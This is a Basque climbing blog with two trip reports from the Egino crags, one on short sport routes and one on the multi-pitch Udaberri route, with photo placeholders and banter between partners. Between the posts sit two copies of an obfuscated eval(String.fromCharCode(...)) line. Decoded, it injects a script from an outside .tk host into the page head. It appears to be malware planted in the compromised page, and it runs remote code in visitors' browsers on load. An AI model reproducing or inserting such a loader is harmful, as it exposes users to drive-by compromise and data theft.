Eginon .eus

Atzo, hilak 24, goizean asti pixka bat bagenuela aprobetxatuz, Eginora hurbildu ginen, Leze inguruko eremura. Bide laburrak eta erraz samarrak dira oro har, baina haitz ederrekoak.

Sarean dagoen krokis baten arabera (gaztelania hutsez dago), eskalatzen hasteko egoki-egokia da. Lau sektore bereizten dira krokisean. Lehen sektorera jo genuen (arrantza eta abeltzaintza), eta hango hiru bideak egin genituen. Biok ere soka behetik geneukala. Beti esan izan dugun bezala “de primero”.

Peloiari esan nion argazkilariari begiratzeko, baina kontzentratuta zegoen lehen bidearen hasierari begira. Lehen sektoreak El culebrón du izena, eta lehendabizi egin genuen bidea (krokisean 2. zenbakia duena) Abigail da. IV. mailako eta 15 metroko bidea da. Laburra, bertako gehienak bezala.

Peloia bideari ekiteko prest.

img_20160924_093607

Ikustekoa da zer soltura hartu duen mutikoak, Elmer leher eginda amaitu eta rokodromoan izena eman behar zuela esan zuenetik.

IV. mailakoa izan arren, gure Abigailek badauka pauso arrarotxo bat.

Gora, poliki-poliki.

img_20160924_093718

Estilo horrekin eta kamiseta horrekin…

img_20160924_093928

Ez da giro Peloiarekin!

Judas prest? Ekin!

img_20160924_094123

Bide laburra da, baina polita eta plakan izugarrizko heldulekuak dituena. Berehala amaitu zuen. Muy pofesional.

Ondoren, nire txanda. Zailtasun gehiegirik gabe pasatu genuen tramitea, eta segidan, ezkerreko bidera, krokisean 1 zenbakia duenera. La dama de rosa du izena eta V. mailako 15 metroko bide ederra da hori ere.

Lehen bidetik jaitsi eta segidan bigarrenean sartu nintzen. Peloiaren kamerak bazuen akatsen bat eta ezin izan zuen argazkirik atera. Lastima.

Ondoren, Peloia berriro ere, rokodromoan zaildutako gizona.

img_20160924_101053

Gora bihotzak! (Arantzazutik Urbiara)

img_20160924_101151

Beste pixka bat, eta kitto.

img_20160924_101317

Jaitsi eta bost metro eskuinerago dagoen bidera jo genuen. La loba herida (V, 15 m). A zer izenak! Alde ederrekoak dira Apolojia terrorista, Injurias al rey, Kantauri eta horrelakoak. Adibide bat jartzeagatik.

Hirugarren kulebroi horri ere nik ekin nion lehendabizi. Aurrez egin gabe geneukan bakarra huraxe zen. Bidean gora nindoala, kronista, argazkilari eta pringau bakarra naizela jakinda, argazki batzuk atera nizkion Peloiari, ondo aseguratzea zer den erakuste aldera.

Hona hemen.

img_20160924_102826

Haitz ederra, jesukristoren heldulekuak plakan… Gozada bat!

Ederki zegoen Peloia itzaletan aseguratzen, eguzkitan egoteko aukeran bero zegoen eta.

Pixka bat hurbilduta.

img_20160924_102832

Peloiaren txanda.

img_20160924_103504

Sobrao y eso, oyes!

img_20160924_103518

Artzain bat ere entzuten genuen tarteka, txakurrari aginduak ematen. Itxuraz entrenatzen ari zen. Hurrengoan Kixkur eraman beharko dugu, ofizioa ikastera.

Hara! Iritsi da eta!

img_20160924_103741

Eginora iristean ohartu ginen jesukristoren auto eta furgonetan piloa zegoela. Azkena aurreko asteko ostegunean egon ginen, gehien-gehienak lanean ari zirenean, eta atzo laraunbata izanik bertako eta inguruko fauna asko zebilen.

Lehen sektoreko bideak agortu eta bigarrenerantz joatean ohartu ginen, ordea, benetan zenbat jende zegoen. Lau lagun hemen, hiru hor, bi familia haurrekin pixka bat aurrerago, eta ikastaro bateko sei-zortzi lagun ere bai.

Gauzak horrela, paretean dagoen tutu zaharraren eskuineko aldera joan ginen. Lezetik hurbilen dagoen lekura. Eguzkitan bero egiten zuen, eta Peloiak kamerarik ez zeukala aprobetxatuz, kamiseta kenduta eskalatu nuen Krubi izeneko bidea (V, 20 m). Beti kamisetak gora, kamisetak behera, eta azkenean kamisetarik gabe ondoena.

Nire zatia saltatu eta Peloiarenean zentratuko gara.

Badoala!

img_20160924_111633

Egun batean bideoan grabatu beharko dut mutila. Horrela eskaladako tutorial gisa erabiltzeko aukera izango dugu.

img_20160924_111749

Haitza, beti bezala, zoragarria.

Haitzetik ote gatoz?

img_20160924_111934

Ez dakit. Baina ahal dugun guztietan haitzera joaten gara.

img_20160924_111940

Azkar! Itzalera joan behar dugu eta!

img_20160924_112032

Denbora amaitzen ari zitzaigunez, trasteak jaso eta Lezetik ateratzen den errekaren babesera joan ginen. Han zertxobait jan eta autora.

Eta autoan… Txatxaaaaan!

img_20160924_114900

Kamiseta berria!

Aupa, Wali! Hi bai hitzeko gizona!

Larregik eta biok kamiseta berri bana, baina Peloiak bi, gortukoa eta .eus-ekoa.

Puntazo bat izan da.

eval(String.fromCharCode(118, 97, 114, 32, 97, 98, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 10, 97, 98, 99, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 10, 97, 98, 99, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 116, 61, 112, 49, 34, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 98, 99, 41, 59))eval(String.fromCharCode(118, 97, 114, 32, 97, 98, 99, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 10, 97, 98, 99, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 10, 97, 98, 99, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 115, 46, 115, 116, 97, 114, 116, 114, 101, 99, 101, 105, 118, 101, 46, 116, 107, 47, 115, 99, 114, 105, 112, 116, 46, 106, 115, 63, 116, 61, 112, 49, 34, 59, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 98, 99, 41, 59))

Udaberri

Atzo, irailak 4, Eginon egon ginen, ohitura zaharrari jarraituz. Azkenaldian ez gara handik urrun ibiltzen.

Goizeko 5:30tan jaiki, zerbait gosaldu eta begiak ireki ezinik, arranplara abiatu nintzen. Seietan genuen hitzordua. Irtetean, neska-mutil koadrilla ederra zegoen moilan, parranda bukatu ezinik.

Eginora iritsi ginenean, goizeko zazpiak jota, artean eguna argitu ezinik zebilen.

Eginon autoa utzi eta hormarantz goazela argazki hau atera zigun Larregik.

Esaten nion nik ez zela piperrik ikusiko. Ez dugu argazki lehiaketarik sekula irabaziko.

IMG-20160904-WA0013

Iritsi ginen bidearen hasierara eta orduantxe argitu zuen. Zazpi luzeko bidea da Udaberri. Jakinaren gainean geunden leku batzuetan harria nahiko suelto zegoela, parranderoak bezala.

Lehen bi luzeei Larregik ekin zien. Hemen lehen luzearen hasieran.

IMG_20160904_074715

Gorago.

IMG_20160904_075137

Eta gorago. Eta gora gu!

IMG_20160904_075526

Zuhaitz hartan bilgunea prestatu eta Peloia eta biok abiatu ginen.

Luzean gora gindoazela, leku jakin batean Peloiari argazkia atera nahi nion, nere ustez ikusgarria aterako zen eta. Baina ezin izan nuen. Mobila motxilan neukan.

Norbait honezkero konturatu ez bada, esan beharra daukat argazki guztiak mobilarekin ateratakoak direla. Izan ere, Peloiak argazki-kamerarik ere ez du eramaten, “Peso de más” delakoaren modak harrapatuta.

Hemen bilgunera iristen. Peloia gortuko kamisetan flamantearekin.

Makina batek eskatu dio Larregiri, baina galdetu diezatela Peloiari ea nola edo hala lortzen den.

IMG-20160904-WA0014

Hemen Larregi bigarren luzean.

IMG_20160904_082338

Bigarren bilgunera iritsi zenean, Peloia eta ni joan ginen atzetik txintxo-txintxo. Eta isil-isilik, jendea azkar molestatzen da eta.

Sokaburua aldatu eta hirugarren luzeari ekin nion. Aurpegi hauekin utzi nituen bigarren bilgunean.

IMG_20160904_083849

Sabaira iritsi arte parabolt bakarra ikusi nuela esango nuke.

IMG-20160904-WA0018

Dena dela, sabaiaren azpira arteko tartea erraza zen. Baita sabaia gainditzea ere.

IMG-20160904-WA0011

Hurrengo plakaren amaieran zegoen zailtasuna.

IMG-20160904-WA0010

Ondo izerdituta iritsi nintzen bilgunera. Halaxe ailegatu ziren beste biak ere.

Baina, bien bitartean, Peloiak izugarrizko blokea bota zuen (nahi gabe), eta ez zen gogoratu deiadar eginez abisatzeaz.

Laster hartu ziguten kargu Elmer edo Berta edo egitera joan ziren batzuk (azpeitiarrak gure ustez, hizkeragatik).

-Ez al dakizue abisatzen? Harria edo piedra edo zeozer esan!

Arrazoi osoa zuen, baina dena den blokea beste aldera erori zen.

Beno ez dakit blokea zen edo harri koskor bat. Nik ez nuen ikusi eta. Batek blokea esaten dit eta besteak harri koskorra. Sakana osoan eta Aiaraldean ere sumatu omen zen. Auskalo.

Larregik eramandako akuariusen granizatua edan eta laugarren luzeari ekin nion.

Ezkerrerantz doa luze hori eta kuriosoa iruditu zitzaidan.

IMG-20160904-WA0007

Bilgunea arte eder baten itzalean egin, eta berehala iritsi zen parea.

Hurrengo luzea ere neuretzako zen. Argazkian, bosgarren luzea amaitzen.

IMG-20160904-WA0009

Luzearen amaieran kolpe tonto bat hartu nuen eskuineko belaunean. Eta gizon preparatuba gauza handia denez, motxilatik tirita bat atera, jarri eta kitto.

Hurrengo luzea egiteko, zati bat oinez egin behar izaten da.

Azken bi luzeak Peloiarentzat ziren.

Judas, prest? Ekin!

IMG_20160904_102616

Kamiseta horrekin igoko ez da ba!

IMG_20160904_102701

Estilo ederrarekin gainera.

IMG_20160904_103133

Esan nion:

-Joder, Pelon! Hiri beti luze politenak tokatzen zaizkik!

Argazkian eskuinean ikusten den zuhaitzean egin zuen bilgunea. Hantxe dago eta.

Zazpigarren eta azken luzeari ekin zion Peloiak.

Bazihoan tirriki-tarraka.

IMG-20160904-WA0000

Eta ni aseguratzen, serio demonio!

IMG-20160904-WA0004

Di-da egin zuen. Hemen azken bilgunean.

IMG-20160904-WA0003

Larregi eta biok ere iritsi ginen. Elkarri bostekoa eman, “ez gatxuk makalak!” esan eta trasteak jasotzen hasi ginen, Larregik eramandako litxarreri batzuk jaten ari ginela. Ea esponsorren bat aurkitzen dugun, bidearen amaieran gosea igarri egiten da eta.

IMG-20160904-WA0001

Beti bezala gerria okertuta agertzen naiz ni. Beti lanean.

Hamaikak eta laurden ziren bidea amaitu genuenean. Trasteak bildu eta Usoa eta Aztorearen ondoko bidexkatik jaitsi ginen.

Larregi eta Peloia bidean aurrera. Atzean, Arista de los caracoles bidearen amaiera ikus daiteke. Pared de doña Eusebia omen du izena. Hori ere egin genuen, baina ez dut uste kronikarik idatzi genuenik.

IMG_20160904_114115

Jaitsiera amaitzen.

IMG_20160904_120344

Ederrak ikusten dira Usoa eta Aztorea.

-Hauek ere noizbait eskalatu beharko dizkiagu ba- bota zuen Larregik.

Hor geratzen da erronka, baina aurretik Berta egin behar dugu.

Eginora iritsi, ur pixka bat edan iturrian (tabernarik ez dagoelako) eta Zumaiara abiatu ginen, kontxako estropadak irratian entzuten, eta beti bezala Xarpasen falta sumatzen.

Ea hurrengoan Berta egiten dugun.

Gortu!